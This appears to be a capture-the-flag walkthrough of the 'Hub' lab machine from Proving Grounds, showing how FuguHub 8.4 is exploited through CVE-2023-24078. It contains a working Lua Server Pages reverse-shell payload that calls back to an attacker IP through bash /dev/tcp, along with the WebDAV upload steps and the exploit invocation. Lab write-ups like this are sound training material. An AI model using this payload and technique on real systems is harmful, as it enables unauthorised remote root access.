In this walk through, we will be going through the Hub room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploitation of FuguHub CMS using CVE-2023-24078 which eventually gives us root on the target. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Hub |
IPaddress | 192.168.171.25 |
Difficulty | Easy |
OS | Linux |
Description | Hub is an Easy rated Linux machine that is running FuguHub CMS which is vulnerable to CVE-2023-24078 that is a RCE vulnerability. |
Enumeration:
- I started off with my regular aggressive nmap scan and found 4 ports opened – 22 (SSH), 80, 8082, 9999 (HTTP).
$ sudo nmap -A 192.168.171.25 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-28 22:48 IST Nmap scan report for 192.168.171.25 Host is up (0.20s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.4p1: | PRION:CVE-2016-20012 5.0 https://vulners.com/prion/PRION:CVE-2016-20012 | PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 | PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 | PRION:CVE-2021-41617 3.5 https://vulners.com/prion/PRION:CVE-2021-41617 | PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368 |_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368 53/tcp filtered domain 80/tcp open http nginx 1.18.0 |_http-server-header: nginx/1.18.0 |_http-title: 403 Forbidden 8082/tcp open http Barracuda Embedded Web Server | http-methods: |_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK |_http-server-header: BarracudaServer.com (Posix) |_http-title: Home | http-webdav-scan: | Server Date: Sun, 28 Jan 2024 17:19:16 GMT | WebDAV type: Unknown | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK |_ Server Type: BarracudaServer.com (Posix) 9999/tcp open ssl/http Barracuda Embedded Web Server | http-methods: |_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK |_http-server-header: BarracudaServer.com (Posix) |_http-title: Home | http-webdav-scan: | Server Date: Sun, 28 Jan 2024 17:19:17 GMT | WebDAV type: Unknown | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK |_ Server Type: BarracudaServer.com (Posix) | ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US | Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost | Not valid before: 2019-07-16T19:15:09 |_Not valid after: 2074-04-18T19:15:09 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=1/28%OT=22%CT=1%CU=39491%PV=Y%DS=4%DC=T%G=Y%TM=65B68C9 OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O1=M OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7% OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y% OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD= OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=86 OS:60%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 111/tcp) HOP RTT ADDRESS 1 202.12 ms 192.168.45.1 2 202.09 ms 192.168.45.254 3 202.91 ms 192.168.251.1 4 202.93 ms 192.168.171.25 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 72.66 seconds
- Enumerated the web server on port 80, it threw a 403 Forbidden error on my face.
- Next, enumerated the web server on port 8082. It reveals a application running on it. As per the nmap results, it is running “Barracuda Embedded Web Server”.
- Looked around the application and found a page where i can set an Administrator account. So, i created one with the below information.
email - [email protected] Admin username - admin Password - password
- Next, i used the created account information to log in to the CMS. Configured it with default settings and clicked save.
admin: password
- Now, i was able to access a Web File Server. At this point, i wasn’t sure what to do next. So, fired gobuster on the target to reveal any juicy directories.
gobuster dir -u http://192.168.171.25/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
- Enumerated around the application reveals a License page where the application version was highlighted – FuguHub 8.4.
CVE-2023-24078
- Looked for any known exploits related to the concerned version and found that the target version is vulnerable to CVE-2023-24078 that is RCE vulnerability.
- Copied the exploit to my current working directory using searchsploit.
searchsploit FuguHub searchsploit -m multiple/webapps/51550.py
Exploitation & Getting root:
- The exploits takes a listening IP and port for reverse shell along with the target host and port as input. Once the execution is completed, it should get a shell back on my listener but it didn’t
python3 51550.py -l 192.168.45.182 -p 4444 -r 192.168.171.25 -rp 8082
- So, i performed the exploitation manually, i went to target location and copied the WebDAV session URL.
http://192.168.171.25:8082/fs/
http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/
- Prepared the below lua script that will be used as our payload.
<div style="margin-left:auto;margin-right: auto;width: 350px;"> <div id="info"> <h2>Lua Server Pages Reverse Shell</h2> <p>Delightful, isn't it?</p> </div> <?lsp if request:method() == "GET" then ?> <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.182/4444 0>&1'") ?> <?lsp else ?> You sent a <?lsp=request:method()?> request <?lsp end ?> </div>
- Next, accessed the webDAV share using cadaver and uploaded our lua script to the it.
$ cadaver dav:!> open http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/ dav:/fs/0dae0a33426ff7bf48d68b67/> cd .. Authentication required for Web File Server on server `192.168.171.25': Username: admin Password: dav:/fs/> put rev.lsp Uploading rev.lsp to `/fs/rev.lsp': Progress: [=============================>] 100.0% of 364 bytes succeeded. dav:/fs/>
- We can then execute our shell by visiting to the below URL giving us the shell as user root.
http://192.168.171.25:8082/rev.lsp
- Finally, captured the root flag and completed the machine.
Also Read: PG – Heist
Conclusion:
So that was “Hub” for you. We started off with a regular nmap scan and found 4 ports opened – 22 (SSH), 80, 8082, 9999 (HTTP). Enumerated the web server on port 8082 which reveals “Barracuda Embedded Web Server” running on it. Created an admin account and got access to the backend which reveals version of FugHub 8.4. Looked online for any known exploit and found that it is vulnerable to CVE-2023-24078. Used the same to exploit and get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.